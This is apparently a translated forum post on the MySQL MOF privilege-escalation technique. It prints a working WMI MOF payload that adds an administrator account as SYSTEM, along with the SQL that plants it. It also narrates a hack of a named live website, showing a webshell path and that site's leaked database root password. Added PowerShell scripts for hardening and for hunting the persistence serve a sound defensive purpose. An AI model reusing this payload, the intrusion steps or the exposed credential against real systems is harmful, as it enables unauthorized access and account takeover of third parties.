MySQL MOF extension vulnerability: prevention methods
Some exploit code that has been published online:
    #pragma namespace("\\\\.\\root\\subscription")

    instance of __EventFilter as $EventFilter
    {
        EventNamespace = "Root\\Cimv2";
        Name = "filtP2";
        // fires every time the local clock's seconds field reads 5, i.e. once a minute
        Query = "Select * From __InstanceModificationEvent "
                "Where TargetInstance Isa \"Win32_LocalTime\" "
                "And TargetInstance.Second = 5";
        QueryLanguage = "WQL";
    };

    instance of ActiveScriptEventConsumer as $Consumer
    {
        Name = "consPCSV2";
        ScriptingEngine = "JScript";
        ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
    };

    instance of __FilterToConsumerBinding
    {
        Consumer = $Consumer;
        Filter = $EventFilter;
    };

After connecting to the MySQL database, execute:

    select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';

What this relies on: the MySQL account holds the FILE privilege (both load_file() and INTO DUMPFILE are gated by it), secure_file_priv is not set, mysqld runs as LocalSystem and can therefore write into system32\wbem\mof, and on Windows XP / Server 2003 WMI automatically compiles any .mof file dropped into that directory. The compiled MOF registers a permanent event subscription in root\subscription that runs the JScript every time the clock's seconds field hits 5, so the net user command is executed as SYSTEM once a minute until the subscription is removed; deleting the .mof file afterwards does not undo it.
From the above code the countermeasures follow:

1. MySQL account privilege control: do not grant the FILE privilege, which is what enables load_file() and SELECT ... INTO DUMPFILE / OUTFILE (there is no way to switch those functions off individually), and set secure_file_priv so that server-side file reads and writes are confined to one directory or disabled. The web application should not connect as root.

2. Disable the WScript.Shell component. This is a weak control on its own: a CommandLineEventConsumer runs a command line without any COM object, so a MOF that uses it instead of ActiveScriptEventConsumer is unaffected.

3. Directory permissions on c:/windows/system32/wbem/mof/: remove the built-in special group CREATOR OWNER. This only helps if mysqld runs under a dedicated service account; if the service runs as LocalSystem no directory ACL stops it. Note also that automatic compilation of this directory exists only on Windows XP / Server 2003, which is why the technique works there and not on later versions.
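The following PowerShell script is an added example and not code from the original post. It checks and applies the three points above on the MySQL host. The mysql.exe path, the application account 'webapp'@'localhost' and the MySQL service name pattern are assumptions; run it from an elevated prompt.

```powershell
# Added example, not part of the original post. Assumptions (hypothetical):
# the mysql.exe path, an application account 'webapp'@'localhost', a service
# named MySQL*, and the default wbem location. Run from an elevated prompt;
# mysql.exe prompts for the root password.
$MysqlExe = 'C:\Program Files\MySQL\MySQL Server 5.5\bin\mysql.exe'   # assumption
$MofDir   = Join-Path $env:SystemRoot 'System32\wbem\mof'

# --- 1. MySQL: FILE privilege and secure_file_priv ---------------------------
# load_file() and SELECT ... INTO DUMPFILE are gated by the global FILE
# privilege; there is no per-function switch. Audit who holds it, then revoke.
$audit = @"
SELECT User, Host FROM mysql.user WHERE File_priv = 'Y';
SHOW VARIABLES LIKE 'secure_file_priv';
"@
& $MysqlExe -u root -p -e $audit

$fix = @"
REVOKE FILE ON *.* FROM 'webapp'@'localhost';
FLUSH PRIVILEGES;
"@
& $MysqlExe -u root -p -e $fix
# Then pin server-side file I/O to one dedicated directory in my.ini ([mysqld]
# section) and restart the service; newer versions also accept NULL to disable it:
#   secure-file-priv = "C:/mysql-files"

# The ACL change in step 3 is pointless if mysqld runs as LocalSystem: that
# account can write anywhere. It should run as a dedicated low-privilege user.
$svc = @(Get-WmiObject -Class Win32_Service -Filter "Name LIKE 'MySQL%'")
$svc | Format-Table Name, StartName -AutoSize
if ($svc | Where-Object { $_.StartName -eq 'LocalSystem' }) {
    Write-Warning 'mysqld runs as LocalSystem; directory ACLs cannot contain it.'
}

# --- 2. WScript.Shell: rename the ProgID keys so new ActiveXObject("WScript.Shell") fails
# Weak control: CommandLineEventConsumer runs a command line without any COM object.
foreach ($progId in 'WScript.Shell', 'WScript.Shell.1') {
    $key = "Registry::HKEY_CLASSES_ROOT\$progId"
    if (Test-Path $key) {
        Rename-Item -Path $key -NewName "$progId.disabled"
    }
}

# --- 3. wbem\mof: remove CREATOR OWNER ----------------------------------------
# The CREATOR OWNER ACE is inherited from System32, so first stop inheritance
# while copying the inherited ACEs, then purge that identity and write back.
$acl = Get-Acl -Path $MofDir
$acl.SetAccessRuleProtection($true, $true)
Set-Acl -Path $MofDir -AclObject $acl

$acl = Get-Acl -Path $MofDir
$acl.PurgeAccessRules([System.Security.Principal.NTAccount]'CREATOR OWNER')
Set-Acl -Path $MofDir -AclObject $acl

(Get-Acl -Path $MofDir).Access |
    Format-Table IdentityReference, FileSystemRights, AccessControlType, IsInherited -AutoSize
```

Step 1 is the one that actually removes the precondition: without FILE and with secure_file_priv pinned, the dumpfile write never happens, whatever the Windows-side ACLs look like. Steps 2 and 3 are defence in depth and, as noted in the list, each can be sidestepped by a payload that does not need WScript.Shell or by a service running as LocalSystem.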
Of course, those three points are what's said online. It feels like the privileges needed are quite high, e.g. root, and MySQL remote connections. I ran into one yesterday, so let me demonstrate it for everyone.
Here's how it happened: a buddy asked a question on the forum, so I took a look and found a big shot had already taken it down, saying it was done with MySQL MOF extension privilege escalation.
But being a noob I'd never heard of it, so I hurried off to look up material and study... which is where the content above from the web came from.
Once I understood it, time to practice.
http://www.webbmw.com/config/config_ucenter.php  one-liner shell, a
    $_config['db']['1']['dbhost'] = 'localhost';
    $_config['db']['1']['dbuser'] = 'root';
    $_config['db']['1']['dbpw'] = 'tfr226206';
    $_config['db']['1']['dbcharset'] = 'gbk';
    $_config['db']['1']['pconnect'] = '0';
    $_config['db']['1']['dbname'] = 'webbmw';
    $_config['db']['1']['tablepre'] = 'pre_';
    $_config['db']['common']['slave_except_table'] = '';

There's the root password.
So I went straight to work with Chopper (菜刀):

Upload the shell first.
Now that we have those accounts and such, let's execute.......
A small note:
The first execution here failed, reason unknown.
I wondered whether the code we executed had a problem, so I went and found code on wooyun.
    #pragma namespace("\\\\.\\root\\subscription")

    instance of __EventFilter as $EventFilter
    {
        EventNamespace = "Root\\Cimv2";
        Name = "filtP2";
        Query = "Select * From __InstanceModificationEvent "
                "Where TargetInstance Isa \"Win32_LocalTime\" "
                "And TargetInstance.Second = 5";
        QueryLanguage = "WQL";
    };

    instance of ActiveScriptEventConsumer as $Consumer
    {
        Name = "consPCSV2";
        ScriptingEngine = "JScript";
        ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
    };

    instance of __FilterToConsumerBinding
    {
        Consumer = $Consumer;
        Filter = $EventFilter;
    };
I put the file at C:\WINDOWS\temp\1.mof

so we change the statement we execute accordingly:
    select load_file('C:\\WINDOWS\\temp\\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
    -- backslashes doubled: in a MySQL string literal a single backslash starts an
    -- escape sequence, so 'C:\WINDOWS\temp\1.mof' is read as C:WINDOWS<tab>emp1.mof
    -- and load_file() returns NULL; forward slashes in the path work as well
But you'll find the account still isn't sitting there..
So I got frustrated.
So I went and executed it one by one, and when I got to the 2nd one, mysql, it succeeded.........
But the other databases all failed...
I'm really puzzled; why on earth doesn't it work? Asking the experts for an answer...
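Whatever the reason a particular run did or did not add the account, the persistent part of the technique is the WMI subscription that the MOF compiles into the repository, and that is what an incident responder has to find and remove. The PowerShell script below is an added example, not code from the original post: it lists every script or command-line consumer in root\subscription together with its binding and trigger query, checks the on-disk traces that the XP/2003 autocompiler leaves, and with the (hypothetical) -Remediate switch deletes the subscription. The names filtP2 / consPCSV2 and the accounts admin / test are the ones used in the post's MOF.

```powershell
# Added example, not part of the original post. Hunts the persistence that the
# compiled MOF leaves in the WMI repository (deleting nullevt.mof does not undo
# it) and, with -Remediate, removes it. The -Remediate switch is hypothetical;
# the names filtP2 / consPCSV2 and the accounts admin / test come from the post.
param([switch]$Remediate)

$ns        = 'root\subscription'
$bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)
$filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
$consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)  # returns all subclasses

# Only script and command-line consumers execute attacker-supplied code.
$suspicious = $consumers | Where-Object {
    'ActiveScriptEventConsumer', 'CommandLineEventConsumer' -contains $_.__CLASS
}

foreach ($c in $suspicious) {
    $payload = if ($c.__CLASS -eq 'ActiveScriptEventConsumer') { $c.ScriptText } else { $c.CommandLineTemplate }
    Write-Output "[$($c.__CLASS)] $($c.Name)"
    Write-Output "    payload: $payload"

    # Binding.Consumer is a reference path such as ActiveScriptEventConsumer.Name="consPCSV2"
    $bound = $bindings | Where-Object { $_.Consumer -like "*$($c.__CLASS).Name=`"$($c.Name)`"*" }
    foreach ($b in $bound) {
        $f = $filters | Where-Object { $b.Filter -like "*Name=`"$($_.Name)`"*" }
        Write-Output "    trigger: $($f.Name) -> $($f.Query)"
        if ($Remediate) {
            # Binding first, then the filter. A filter can be shared by several
            # bindings; check $bindings before deleting one you did not expect.
            $b | Remove-WmiObject
            $f | Remove-WmiObject
        }
    }
    if ($Remediate) { $c | Remove-WmiObject }
}

# On XP / Server 2003 the autocompiler moves processed files into mof\good or
# mof\bad and mofcomp writes a log under wbem\Logs; both survive the attacker
# deleting nullevt.mof. They are absent on later Windows, where the directory
# is not auto-compiled and this technique does not work.
$wbem = Join-Path $env:SystemRoot 'System32\wbem'
Get-ChildItem -Path (Join-Path $wbem 'mof\good'), (Join-Path $wbem 'mof\bad') -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime
Get-ChildItem -Path (Join-Path $wbem 'Logs') -Filter 'mofcomp*.log' -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime

# The post's payloads add local accounts admin / test; list local accounts so an
# unexpected one stands out.
Get-WmiObject -Class Win32_UserAccount -Filter "LocalAccount = TRUE" |
    Select-Object Name, Disabled, SID
```

Run it once without -Remediate and read the output first: the benign subscriptions that ship with Windows use other consumer classes (for example NTEventLogEventConsumer on Server 2008) and are not touched, but anything that appears as ActiveScriptEventConsumer or CommandLineEventConsumer with a Win32_LocalTime trigger and a net user or similar payload is the footprint this post describes. Remove the binding before the consumer and filter; otherwise WMI keeps a dangling reference.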